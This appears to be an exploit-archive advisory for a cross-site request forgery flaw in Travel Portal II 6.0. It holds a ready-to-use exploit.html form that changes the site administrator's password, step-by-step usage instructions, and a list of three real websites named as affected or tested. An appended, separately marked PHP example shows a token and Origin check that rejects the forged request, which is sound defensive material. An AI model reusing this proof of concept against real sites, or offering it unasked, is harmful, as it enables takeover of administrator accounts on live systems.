Travel Portal II 6.0 Cross Site Request Forgery

2014.09.13
Credit: KnocKout
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com - http://www.cyber-warrior.org/100379
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x.. Apologies to anyone we forgot..
############################################################
Turkey Security Group 'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Travel Portal II (6.0)
|~Affected Version : II 6.0 and predecessors.. / all versions
|~Official Software Web: http://www.tourismscripts.com/scripts/scripts/hotel-cars-flights-villas-flats-custom-potal-script.html
|~PRICE : 349 Euro
|~RISK : High
|~Google Keyword/Dorks : N/A
|~Tested On : Kali Linux \ Mozilla Firefox
####################INFO################################
The admin password can be changed easily..
####################Usage Exploit########################
Exploitation
Edit exploit.html to point at the target website..
Open exploit.html in your browser..
Determine your new password.
Go to the admin panel..

####################Example affected sites & Tested on#####
http://travelportal.tourismscripts.com/ ( Official Demo )
http://almarjanmakkah.com
http://www.istanbulairportal.com

==============================================================================
Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit ; exploit.html
==============================================================================
<h3>Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploited by KnocKout</h3>
<!-- Cross-site POST to the admin handler; the form carries no anti-CSRF token -->
<form method="post" action="http://[VICTIM]/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<table>
<tr>
<td align=right>Username:</td><td align=left><input name="admin_name" size="40" maxlength="40" value="admin"></td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40"></td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</tr>
</table>
</form>
=====================================
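A server-side check that would reject the forged POST above, as an added example (not Travel Portal II code and not from the advisory's author). It assumes the handler reads the admin_id, admin_name and password fields shown in the PoC form; the csrf_token field, the function names and the portal.example origin are hypothetical.

```php
<?php
// Added example, not Travel Portal II source. admin_id / admin_name / password come
// from the PoC form; csrf_token, the function names and the origins are hypothetical.

// Issue one random token per session; the admin form embeds it as a hidden field.
function csrf_issue(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a password-change request may proceed.
// $session ~ $_SESSION, $post ~ $_POST, $server ~ $_SERVER; $ownOrigin is the site's origin.
function password_change_allowed(array $session, array $post, array $server, string $ownOrigin): bool {
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // Modern browsers send Origin on cross-site form POSTs; reject a foreign one.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $ownOrigin) {
        return false;
    }
    // Token must exist in the session and match the submitted value (constant-time compare).
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

// Constructed requests for demonstration.
$session = [];
$token = csrf_issue($session);
$own = 'https://portal.example';
$fields = ['admin_id' => '1', 'admin_name' => 'admin', 'password' => 'new-secret'];

$cases = [
    'admin form, same origin, token'   => [$fields + ['csrf_token' => $token], ['HTTP_ORIGIN' => $own]],
    'PoC form, foreign origin'         => [$fields, ['HTTP_ORIGIN' => 'https://other.example']],
    'PoC form, no Origin, no token'    => [$fields, []],
    'foreign origin with guessed token' => [$fields + ['csrf_token' => str_repeat('0', 64)], ['HTTP_ORIGIN' => 'https://other.example']],
];
foreach ($cases as $label => [$post, $server]) {
    $ok = password_change_allowed($session, $post, $server + ['REQUEST_METHOD' => 'POST'], $own);
    echo $label, ': ', $ok ? 'allowed' : 'rejected', PHP_EOL;
}
```

Requiring the current admin password in the same form, and setting SameSite on the session cookie, are complementary controls for this handler.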

